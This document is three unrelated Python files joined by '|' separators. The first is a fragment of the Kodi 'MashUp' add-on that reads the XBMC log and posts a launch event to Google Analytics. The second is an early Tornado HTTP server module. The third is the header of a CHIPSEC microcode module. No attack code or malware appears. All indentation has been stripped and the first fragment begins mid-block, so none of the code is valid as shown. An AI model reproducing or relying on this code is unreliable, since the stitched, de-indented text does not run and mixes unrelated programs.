logfile = open(log, 'r').read()
except:
logfile='Starting XBMC ('+str(versionNumber)+'.0 Git:.+?Platform: Unknown. Built.+?'
match=re.compile('Starting XBMC \((.+?) Git:.+?Platform: (.+?)\. Built.+?').findall(logfile)
print '========================== '+PATH+' '+VERSION+' =========================='
try:
repo = os.path.join(repopath, 'addon.xml')
repofile = open(repo, 'r').read()
repov=re.compile('version="([^"]+?)" provider-name').findall(repofile)
if repov:
RepoVer = repov[0]
except:
RepoVer='Repo Not Intalled'
try:
from hashlib import md5
except:
from md5 import md5
from random import randint
import time
from urllib import unquote, quote
from os import environ
from hashlib import sha1
import platform
VISITOR = selfAddon.getSetting('visitor_ga')
for build, PLATFORM in match:
if re.search('12.0',build,re.IGNORECASE):
build="Frodo"
if re.search('11.0',build,re.IGNORECASE):
build="Eden"
if re.search('13.0',build,re.IGNORECASE):
build="Gotham"
print build
print PLATFORM
print "Repo Ver. "+RepoVer
utm_gif_location = "http://www.google-analytics.com/__utm.gif"
utm_track = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmt=" + "event" + \
"&utme="+ quote("5(APP LAUNCH*"+"Mash Up v"+VERSION+"/ Repo v"+RepoVer+"*"+build+"*"+PLATFORM+")")+\
"&utmp=" + quote(PATH) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR,VISITOR,"2"])
try:
print "============================ POSTING APP LAUNCH TRACK EVENT ============================"
send_request_to_google_analytics(utm_track)
except:
print "============================ CANNOT POST APP LAUNCH TRACK EVENT ============================"
utm_track = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmt=" + "event" + \
"&utme="+ quote("5(APP LAUNCH*"+"Mash Up v"+VERSION+"/ Repo v"+RepoVer+"*"+PLATFORM+")")+\
"&utmp=" + quote(PATH) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR,VISITOR,"2"])
try:
print "============================ POSTING APP LAUNCH TRACK EVENT ============================"
send_request_to_google_analytics(utm_track)
except:
print "============================ CANNOT POST APP LAUNCH TRACK EVENT ============================"
checkGA()
################################################################################ Types of Directories ##########################################################################################################
def addDirX(name,url,mode,iconimage,plot='',fanart='',dur=0,genre='',year='',imdb='',tmdb='',isFolder=True,searchMeta=False,addToFavs=True,
id=None,fav_t='',fav_addon_t='',fav_sub_t='',metaType='Movies',menuItemPos=None,menuItems=None,down=False,replaceItems=True,index=False):
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&iconimage="+urllib.quote_plus(iconimage)+"&plot="+urllib.quote_plus(plot)+"&fanart="+urllib.quote_plus(fanart)+"&genre="+urllib.quote_plus(genre)+"&index="+str(index)
if searchMeta:
if metaType == 'TV':
infoLabels = GETMETAEpiT(name,iconimage,plot)
else:
infoLabels = GETMETAT(name,genre,fanart,iconimage,plot,imdb,tmdb)
iconimage = infoLabels['cover_url']
if iconimage.startswith('w342') or iconimage.startswith('w92') or iconimage.startswith('w500') or iconimage.startswith('original') or iconimage.startswith('w154') or iconimage.startswith('w185'):
iconimage = 'http://image.tmdb.org/t/p/' + iconimage
fanart = infoLabels['backdrop_url']
if fanart.startswith('original') or fanart.startswith('w1280') or fanart.startswith('w780') or fanart.startswith('w300'):
fanart = 'http://image.tmdb.org/t/p/' + fanart
plot = infoLabels['plot']
if not fanart: fanart=fanartimage
if not iconimage: iconimage=art+'/vidicon.png'
if not plot: plot='Sorry description not available'
plot=plot.replace(",",'.')
Commands = []
if selfAddon.getSetting("ctx_fav") != "false" and addToFavs:
fav = getFav()
fname = name.replace(",",'')
if isFolder:
Commands.append(("[B][COLOR blue]Add[/COLOR][/B] to My Fav's",fav.add_directory(fname, u, section_title=fav_t, section_addon_title=fav_addon_t+" Fav's", sub_section_title=fav_sub_t, img=iconimage, fanart=fanart, infolabels={'item_mode':mode, 'item_url':url, 'plot':plot,'duration':dur,'genre':genre,'year':year})))
else:
Commands.append(("[B][COLOR blue]Add[/COLOR][/B] to My Fav's",fav.add_video_item(fname, u, section_title=fav_t, section_addon_title=fav_addon_t+" Fav's", sub_section_title=fav_sub_t, img=iconimage, fanart=fanart, infolabels={'item_mode':mode, 'item_url':url, 'plot':plot,'duration':dur,'genre':genre,'year':year})))
Commands.append(("[B][COLOR red]Remove[/COLOR][/B] from My Fav's",fav.delete_item(fname, section_title=fav_t, section_addon_title=fav_addon_t+" Fav's", sub_section_title=fav_sub_t)))
if down:
sysurl = urllib.quote_plus(url)
sysname= urllib.quote_plus(name)
Commands.append(('Direct Download', 'XBMC.RunPlugin(%s?mode=190&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
if selfAddon.getSetting("jdcb") == "true":
Commands.append(('Download with jDownloader', 'XBMC.RunPlugin(%s?mode=776&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
else:
Commands.append(('Copy to Clipboard', 'XBMC.RunPlugin(%s?mode=776&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
if searchMeta:
Commands.append(('[B]Super Search [COLOR=FF67cc33]Me[/COLOR][/B]','XBMC.Container.Update(%s?mode=21&name=%s&url=%s)'% (sys.argv[0], urllib.quote_plus(name),'###')))
if metaType == 'TV' and selfAddon.getSetting("meta-view-tv") == "true":
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
cname = infoLabels['title']
cname = cname.decode('ascii', 'ignore')
cname = urllib.quote_plus(cname)
sea = infoLabels['season']
epi = infoLabels['episode']
imdb_id = infoLabels['imdb_id']
if imdb_id != '':
if infoLabels['overlay'] == 6: watched_mark = 'Mark as Watched'
else: watched_mark = 'Mark as Unwatched'
Commands.append((watched_mark, 'XBMC.RunPlugin(%s?mode=779&name=%s&url=%s&iconimage=%s&season=%s&episode=%s)' % (sys.argv[0], cname, 'episode', imdb_id,sea,epi)))
Commands.append(('Refresh Metadata', 'XBMC.RunPlugin(%s?mode=780&name=%s&url=%s&iconimage=%s&season=%s&episode=%s)' % (sys.argv[0], cname, 'episode',imdb_id,sea,epi)))
elif metaType == 'Movies' and selfAddon.getSetting("meta-view") == "true":
xbmcplugin.setContent(int(sys.argv[1]), 'Movies')
if id != None: xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_PLAYLIST_ORDER )
else: xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_UNSORTED )
xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_TITLE )
xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_YEAR )
xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_RATING )
xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_GENRE )
xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_MPAA_RATING )
cname=urllib.quote_plus(infoLabels['metaName'])
imdb_id = infoLabels['imdb_id']
if infoLabels['overlay'] == 6: watched_mark = 'Mark as Watched'
else: watched_mark = 'Mark as Unwatched'
Commands.append((watched_mark, 'XBMC.RunPlugin(%s?mode=777&name=%s&url=%s&iconimage=%s)' % (sys.argv[0], cname, 'movie',imdb_id)))
Commands.append(('Play Trailer','XBMC.RunPlugin(%s?mode=782&name=%s&url=%s&iconimage=%s)'% (sys.argv[0],cname,'_',imdb_id)))
Commands.append(('Refresh Metadata', 'XBMC.RunPlugin(%s?mode=778&name=%s&url=%s&iconimage=%s)' % (sys.argv[0], cname, 'movie',imdb_id)))
else:
infoLabels={ "Title": name, "Plot": plot, "Duration": dur, "Year": year ,"Genre": genre,"OriginalTitle" : removeColoredText(name) }
if id != None: infoLabels["count"] = id
Commands.append(('Watch History','XBMC.Container.Update(%s?name=None&mode=222&url=None&iconimage=None)'% (sys.argv[0])))
Commands.append(("My Fav's",'XBMC.Container.Update(%s?name=None&mode=639&url=None&iconimage=None)'% (sys.argv[0])))
Commands.append(('[B][COLOR=FF67cc33]MashUp[/COLOR] Settings[/B]','XBMC.RunScript('+xbmc.translatePath(mashpath + '/resources/libs/settings.py')+')'))
if menuItemPos != None:
for mi in reversed(menuItems):
Commands.insert(menuItemPos,mi)
liz=xbmcgui.ListItem(name, iconImage=art+'/vidicon.png', thumbnailImage=iconimage)
liz.addContextMenuItems( Commands, replaceItems=False)
if searchMeta:
liz.setInfo( type="Video", infoLabels=infoLabels )
liz.setProperty('fanart_image', fanart)
return xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=isFolder)
def addDirT(name,url,mode,iconimage,plot,fanart,dur,genre,year,index=False):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,fav_t='TV',fav_addon_t='TV Show',fav_sub_t='Shows',index=index)
def addPlayT(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=False,fav_t='TV',fav_addon_t='TV Show',fav_sub_t='Shows')
def addDirTE(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,searchMeta=1,metaType='TV',fav_t='TV',fav_addon_t='TV Episode',fav_sub_t='Episodes')
def addPlayTE(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,searchMeta=1,metaType='TV',fav_t='TV',fav_addon_t='TV Episode',fav_sub_t='Episodes')
def addDirM(name,url,mode,iconimage,plot,fanart,dur,genre,year,imdb=''):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,imdb,searchMeta=1,fav_t='Movies',fav_addon_t='Movie')
def addPlayM(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,searchMeta=1,fav_t='Movies',fav_addon_t='Movie')
def addDirMs(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,fav_t='Misc.',fav_addon_t='Misc.')
def addPlayMs(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,fav_t='Misc.',fav_addon_t='Misc.')
def addDirL(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,fav_t='Live',fav_addon_t='Live')
def addPlayL(name,url,mode,iconimage,plot,fanart,dur,genre,year,secName='',secIcon=''):
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&iconimage="+urllib.quote_plus(iconimage)+"&plot="+urllib.quote_plus(plot)+"&fanart="+urllib.quote_plus(fanart)+"&genre="+urllib.quote_plus(genre)
surl=urllib.quote_plus(u)
dname=removeColoredText(name)
mi=[('Add to [COLOR=FFa11d21][B]ONTapp.tv[/B][/COLOR]', 'XBMC.RunPlugin(%s?mode=1501&plot=%s&name=%s&url=%s&iconimage=%s)' % (sys.argv[0] ,secName,dname,surl, secIcon))]
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,fav_t='Live',fav_addon_t='Live',menuItemPos=2,menuItems=mi)
def addPlayc(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,addToFavs=0)
def addDirb(name,url,mode,iconimage,fanart):
return addDirX(name,url,mode,iconimage,'',fanart,addToFavs=0)
def addDirc(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,addToFavs=0)
def addDirXml(name,url,mode,iconimage,plot,fanart,dur,genre,year):
contextMenuItems = []
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&iconimage="+urllib.quote_plus(iconimage)+"&plot="+urllib.quote_plus(plot)+"&fanart="+urllib.quote_plus(fanart)
liz=xbmcgui.ListItem(name, iconImage=art+'/xmlplaylist.png', thumbnailImage=iconimage)
liz.setInfo( type="Video", infoLabels={ "Title": name, "Plot": plot } )
if fanart == '':
fanart=fanartimage
liz.setProperty('fanart_image', fanart)
if selfAddon.getSetting("addmethod") == "true":
contextMenuItems.append(('[B][COLOR blue]Add[/COLOR][/B] Playlist','XBMC.RunPlugin(%s?name=None&mode=250&url=%s&iconimage=None)'% (sys.argv[0],urllib.quote_plus(plot))))
contextMenuItems.append(("[B][COLOR red]Remove[/COLOR][/B] Playlist",'XBMC.RunPlugin(%s?name=%s&mode=251&url=%s&iconimage=%s)'% (sys.argv[0],name,urllib.quote_plus(url),plot)))
contextMenuItems.append(("[B][COLOR aqua]Edit[/COLOR][/B] Playlist",'XBMC.RunPlugin(%s?name=%s&mode=255&url=%s&iconimage=%s)'% (sys.argv[0],name,urllib.quote_plus(url),plot)))
if selfAddon.getSetting("addmethod") == "true":
contextMenuItems.append(('[B][COLOR blue]Add[/COLOR][/B] Folder','XBMC.RunPlugin(%s?name=%s&mode=252&url=%s&iconimage=None)'% (sys.argv[0],name,plot)))
contextMenuItems.append(('Watch History','XBMC.Container.Update(%s?name=None&mode=222&url=None&iconimage=None)'% (sys.argv[0])))
contextMenuItems.append(("My Fav's",'XBMC.Container.Update(%s?name=None&mode=639&url=None&iconimage=None)'% (sys.argv[0])))
liz.addContextMenuItems(contextMenuItems, replaceItems=False)
if dur=='Livestreams':
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=False)
else:
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=True)
return ok
def addXmlFolder(name,url,mode,iconimage,plot,fanart,dur,genre,year):
contextMenuItems = []
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&iconimage="+urllib.quote_plus(iconimage)+"&plot="+urllib.quote_plus(plot)+"&fanart="+urllib.quote_plus(fanart)
liz=xbmcgui.ListItem(name, iconImage=art+'/folder.png', thumbnailImage=iconimage)
liz.setInfo( type="Video", infoLabels={ "Title": name, "Plot": plot } )
if fanart == '':
fanart=fanartimage
liz.setProperty('fanart_image', fanart)
if selfAddon.getSetting("addmethod") == "true":
contextMenuItems.append(('[B][COLOR blue]Add[/COLOR][/B] Playlist','XBMC.RunPlugin(%s?name=None&mode=250&url=%s&iconimage=None)'% (sys.argv[0],urllib.quote_plus(plot))))
if plot=='home':
contextMenuItems.append(('[B][COLOR blue]Add[/COLOR][/B] Folder','XBMC.RunPlugin(%s?name=%s&mode=252&url=%s&iconimage=None)'% (sys.argv[0],name,urllib.quote_plus(plot))))
contextMenuItems.append(("[B][COLOR red]Remove[/COLOR][/B] Folder",'XBMC.RunPlugin(%s?name=%s&mode=254&url=%s&iconimage=None)'% (sys.argv[0],name,url)))
contextMenuItems.append(("[B][COLOR aqua]Edit[/COLOR][/B] Folder",'XBMC.RunPlugin(%s?name=%s&mode=256&url=%s&iconimage=None)'% (sys.argv[0],name,url)))
contextMenuItems.append(('Watch History','XBMC.Container.Update(%s?name=None&mode=222&url=None&iconimage=None)'% (sys.argv[0])))
contextMenuItems.append(("My Fav's",'XBMC.Container.Update(%s?name=None&mode=639&url=None&iconimage=None)'% (sys.argv[0])))
liz.addContextMenuItems(contextMenuItems, replaceItems=False)
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=True)
return ok
def addLink(name,url,iconimage):
liz=xbmcgui.ListItem(name, iconImage=art+'/link.png', thumbnailImage=iconimage)
liz.setInfo( type="Video", infoLabels={ "Title": name } )
liz.setProperty('fanart_image', fanartimage)
return xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=liz)
def addDir(name,url,mode,iconimage,plot='',fanart='',index=False):
return addDirX(name,url,mode,iconimage,plot,fanart,addToFavs=0,replaceItems=False,index=index)
def addDirHome(name,url,mode,iconimage,index=False):
return addDirX(name,url,mode,iconimage,addToFavs=0,index=index)
def addDirFIX(name,url,mode,iconimage,location,path):
contextMenuItems = []
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&iconimage="+urllib.quote_plus(iconimage)+"&location="+urllib.quote_plus(location)+"&path="+urllib.quote_plus(path)
liz=xbmcgui.ListItem(name, iconImage=art+'/vidicon.png', thumbnailImage=iconimage)
liz.setInfo( type="Video", infoLabels={ "Title": name } )
liz.setProperty('fanart_image', fanartimage)
contextMenuItems.append(('Watch History','XBMC.Container.Update(%s?name=None&mode=222&url=None&iconimage=None)'% (sys.argv[0])))
contextMenuItems.append(("My Fav's",'XBMC.Container.Update(%s?name=None&mode=639&url=None&iconimage=None)'% (sys.argv[0])))
liz.addContextMenuItems(contextMenuItems, replaceItems=False)
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=False)
return ok
def addDown2(name,url,mode,iconimage,fanart):
return addDirX(name,url,mode,iconimage,'',fanart,isFolder=0,addToFavs=0,id=id,down=1)
def addDown3(name,url,mode,iconimage,fanart,id=None):
return addDirX(name,url,mode,iconimage,'',fanart,isFolder=0,searchMeta=1,fav_t='Movies',fav_addon_t='Movie',id=id,down=1)
def addDown4(name,url,mode,iconimage,plot,fanart,dur,genre,year):
f = '</sublink>' in url
if re.search('(?i)\ss(\d+)e(\d+)',name) or re.search('(?i)Season(.+?)Episode',name):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=f,searchMeta=1,metaType='TV',
fav_t='TV',fav_addon_t='TV Episode',fav_sub_t='Episodes',down=not f)
else:
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=f,searchMeta=1,
fav_t='Movies',fav_addon_t='Movie',down=not f)
def addInfo(name,url,mode,iconimage,genre,year):
mi = [('Search Movie25','XBMC.Container.Update(%s?mode=4&url=%s)'% (sys.argv[0],'###'))]
return addDirX(name,url,mode,iconimage,'','','',genre,year,searchMeta=1,fav_t='Movies',fav_addon_t='Movie',menuItemPos=0,menuItems=mi)
def addDirIWO(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,searchMeta=1,fav_t='Movies',fav_addon_t='Movie')
def addDLog(name,url,mode,iconimage,plot,fanart,dur,genre,year):
mi=[("[B][COLOR red]Remove[/COLOR][/B]",'XBMC.RunPlugin(%s?mode=243&name=%s&url=%s)'% (sys.argv[0],name,url))]
if re.search('(?i)\ss(\d+)e(\d+)',name) or re.search('(?i)Season(.+?)Episode',name):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,searchMeta=1,metaType='TV',addToFavs=0,menuItemPos=0,menuItems=mi)
else: return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,searchMeta=1,addToFavs=0,menuItemPos=0,menuItems=mi)
def addSpecial(name,url,mode,iconimage):
liz=xbmcgui.ListItem(name,iconImage="",thumbnailImage = iconimage)
liz.setProperty('fanart_image', fanartimage)
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=False)
def addSearchDir(name,url, mode,iconimage):
#thumbnail = 'DefaultPlaylist.png'
u = sys.argv[0]+"?url="+urllib.quote_plus(url) + "?mode=" + str(mode)
liz = xbmcgui.ListItem(name, iconImage=iconimage, thumbnailImage=iconimage)
liz.setProperty('fanart_image', fanartimage)
xbmcplugin.addDirectoryItem(handle = int(sys.argv[1]), url = u, listitem = liz, isFolder = False)
|
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A non-blocking, single-threaded HTTP server."""
import cgi
import errno
import fcntl
import functools
import ioloop
import iostream
import logging
import socket
import time
import urlparse
class HTTPServer(object):
"""A non-blocking, single-threaded HTTP server.
A server is defined by a request callback that takes an HTTPRequest
instance as an argument and writes a valid HTTP response with
request.write(). request.finish() finishes the request (but does not
necessarily close the connection in the case of HTTP/1.1 keep-alive
requests). A simple example server that echoes back the URI you
requested:
import httpserver
import ioloop
def handle_request(request):
message = "You requested %s\n" % request.uri
request.write("HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n%s" % (
len(message), message))
request.finish()
http_server = httpserver.HTTPServer(handle_request)
http_server.listen(8888)
ioloop.IOLoop.instance().start()
HTTPServer is a very basic connection handler. Beyond parsing the
HTTP request body and headers, the only HTTP semantics implemented
in HTTPServer is HTTP/1.1 keep-alive connections. We do not, however,
implement chunked encoding, so the request callback must provide a
Content-Length header or implement chunked encoding for HTTP/1.1
requests for the server to run correctly for HTTP/1.1 clients. If
the request handler is unable to do this, you can provide the
no_keep_alive argument to the HTTPServer constructor, which will
ensure the connection is closed on every request no matter what HTTP
version the client is using.
If xheaders is True, we support the X-Real-Ip and X-Scheme headers,
which override the remote IP and HTTP scheme for all requests. These
headers are useful when running Tornado behind a reverse proxy or
load balancer.
"""
def __init__(self, request_callback, no_keep_alive=False, io_loop=None,
xheaders=False):
self.request_callback = request_callback
self.no_keep_alive = no_keep_alive
self.io_loop = io_loop or ioloop.IOLoop.instance()
self.xheaders = xheaders
self._socket = None
def listen(self, port):
assert not self._socket
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
flags = fcntl.fcntl(self._socket.fileno(), fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(self._socket.fileno(), fcntl.F_SETFD, flags)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.setblocking(0)
self._socket.bind(("", port))
self._socket.listen(128)
self.io_loop.add_handler(self._socket.fileno(), self._handle_events,
self.io_loop.READ)
def _handle_events(self, fd, events):
while True:
try:
connection, address = self._socket.accept()
except socket.error, e:
if e[0] in (errno.EWOULDBLOCK, errno.EAGAIN):
return
raise
try:
stream = iostream.IOStream(connection, io_loop=self.io_loop)
HTTPConnection(stream, address, self.request_callback,
self.no_keep_alive, self.xheaders)
except:
logging.error("Error in connection callback", exc_info=True)
class HTTPConnection(object):
"""Handles a connection to an HTTP client, executing HTTP requests.
We parse HTTP headers and bodies, and execute the request callback
until the HTTP conection is closed.
"""
def __init__(self, stream, address, request_callback, no_keep_alive=False,
xheaders=False):
self.stream = stream
self.address = address
self.request_callback = request_callback
self.no_keep_alive = no_keep_alive
self.xheaders = xheaders
self._request = None
self._request_finished = False
self.stream.read_until("\r\n\r\n", self._on_headers)
def write(self, chunk):
assert self._request, "Request closed"
self.stream.write(chunk, self._on_write_complete)
def finish(self):
assert self._request, "Request closed"
self._request_finished = True
if not self.stream.writing():
self._finish_request()
def _on_write_complete(self):
if self._request_finished:
self._finish_request()
def _finish_request(self):
if self.no_keep_alive:
disconnect = True
else:
connection_header = self._request.headers.get("Connection")
if self._request.supports_http_1_1():
disconnect = connection_header == "close"
elif ("Content-Length" in self._request.headers
or self._request.method in ("HEAD", "GET")):
disconnect = connection_header != "Keep-Alive"
else:
disconnect = True
self._request = None
self._request_finished = False
if disconnect:
self.stream.close()
return
self.stream.read_until("\r\n\r\n", self._on_headers)
def _on_headers(self, data):
eol = data.find("\r\n")
start_line = data[:eol]
method, uri, version = start_line.split(" ")
if not version.startswith("HTTP/"):
raise Exception("Malformed HTTP version in HTTP Request-Line")
headers = HTTPHeaders.parse(data[eol:])
self._request = HTTPRequest(
connection=self, method=method, uri=uri, version=version,
headers=headers, remote_ip=self.address[0])
content_length = headers.get("Content-Length")
if content_length:
content_length = int(content_length)
if content_length > self.stream.max_buffer_size:
raise Exception("Content-Length too long")
if headers.get("Expect") == "100-continue":
self.stream.write("HTTP/1.1 100 (Continue)\r\n\r\n")
self.stream.read_bytes(content_length, self._on_request_body)
return
self.request_callback(self._request)
def _on_request_body(self, data):
self._request.body = data
content_type = self._request.headers.get("Content-Type", "")
if self._request.method == "POST":
if content_type.startswith("application/x-www-form-urlencoded"):
arguments = cgi.parse_qs(self._request.body)
for name, values in arguments.iteritems():
values = [v for v in values if v]
if values:
self._request.arguments.setdefault(name, []).extend(
values)
elif content_type.startswith("multipart/form-data"):
boundary = content_type[30:]
if boundary: self._parse_mime_body(boundary, data)
self.request_callback(self._request)
def _parse_mime_body(self, boundary, data):
if data.endswith("\r\n"):
footer_length = len(boundary) + 6
else:
footer_length = len(boundary) + 4
parts = data[:-footer_length].split("--" + boundary + "\r\n")
for part in parts:
if not part: continue
eoh = part.find("\r\n\r\n")
if eoh == -1:
logging.warning("multipart/form-data missing headers")
continue
headers = HTTPHeaders.parse(part[:eoh])
name_header = headers.get("Content-Disposition", "")
if not name_header.startswith("form-data;") or \
not part.endswith("\r\n"):
logging.warning("Invalid multipart/form-data")
continue
value = part[eoh + 4:-2]
name_values = {}
for name_part in name_header[10:].split(";"):
name, name_value = name_part.strip().split("=", 1)
name_values[name] = name_value.strip('"').decode("utf-8")
if not name_values.get("name"):
logging.warning("multipart/form-data value missing name")
continue
name = name_values["name"]
if name_values.get("filename"):
ctype = headers.get("Content-Type", "application/unknown")
self._request.files.setdefault(name, []).append(dict(
filename=name_values["filename"], body=value,
content_type=ctype))
else:
self._request.arguments.setdefault(name, []).append(value)
class HTTPRequest(object):
"""A single HTTP request.
GET/POST arguments are available in the arguments property, which
maps arguments names to lists of values (to support multiple values
for individual names). Names and values are both unicode always.
File uploads are available in the files property, which maps file
names to list of files. Each file is a dictionary of the form
{"filename":..., "content_type":..., "body":...}. The content_type
comes from the provided HTTP header and should not be trusted
outright given that it can be easily forged.
An HTTP request is attached to a single HTTP connection, which can
be accessed through the "connection" attribute. Since connections
are typically kept open in HTTP/1.1, multiple requests can be handled
sequentially on a single connection.
"""
def __init__(self, method, uri, version="HTTP/1.0", headers=None,
body=None, remote_ip=None, protocol=None, host=None,
files=None, connection=None):
self.method = method
self.uri = uri
self.version = version
self.headers = headers or HTTPHeaders()
self.body = body or ""
if connection and connection.xheaders:
self.remote_ip = headers.get("X-Real-Ip", remote_ip)
self.protocol = headers.get("X-Scheme", protocol) or "http"
else:
self.remote_ip = remote_ip
self.protocol = protocol or "http"
self.host = host or headers.get("Host") or "127.0.0.1"
self.files = files or {}
self.connection = connection
self._start_time = time.time()
self._finish_time = None
scheme, netloc, path, query, fragment = urlparse.urlsplit(uri)
self.path = path
self.query = query
arguments = cgi.parse_qs(query)
self.arguments = {}
for name, values in arguments.iteritems():
values = [v for v in values if v]
if values: self.arguments[name] = values
def supports_http_1_1(self):
"""Returns True if this request supports HTTP/1.1 semantics"""
return self.version == "HTTP/1.1"
def write(self, chunk):
"""Writes the given chunk to the response stream."""
assert isinstance(chunk, str)
self.connection.write(chunk)
def finish(self):
"""Finishes this HTTP request on the open connection."""
self.connection.finish()
self._finish_time = time.time()
def full_url(self):
"""Reconstructs the full URL for this request."""
return self.protocol + "://" + self.host + self.uri
def request_time(self):
"""Returns the amount of time it took for this request to execute."""
if self._finish_time is None:
return time.time() - self._start_time
else:
return self._finish_time - self._start_time
def __repr__(self):
attrs = ("protocol", "host", "method", "uri", "version", "remote_ip",
"remote_ip", "body")
args = ", ".join(["%s=%r" % (n, getattr(self, n)) for n in attrs])
return "%s(%s, headers=%s)" % (
self.__class__.__name__, args, dict(self.headers))
class HTTPHeaders(dict):
"""A dictionary that maintains Http-Header-Case for all keys."""
def __setitem__(self, name, value):
dict.__setitem__(self, self._normalize_name(name), value)
def __getitem__(self, name):
return dict.__getitem__(self, self._normalize_name(name))
def _normalize_name(self, name):
return "-".join([w.capitalize() for w in name.split("-")])
@classmethod
def parse(cls, headers_string):
headers = cls()
for line in headers_string.splitlines():
if line:
name, value = line.split(": ", 1)
headers[name] = value
return headers
|
#!/usr/bin/python
#CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2015, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#[email protected]
#
# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
# (c) 2010-2012 Intel Corporation
#
# -------------------------------------------------------------------------------
"""
Microcode update specific functionality (for each CPU thread)
usage:
>>> ucode_update_id( 0 )
>>> load_ucode_update( 0, ucode_buf )
>>> update_ucode_all_cpus( 'ucode.pdb' )
>>> dump_ucode_update_header( 'ucode.pdb' )
"""
import struct
import sys
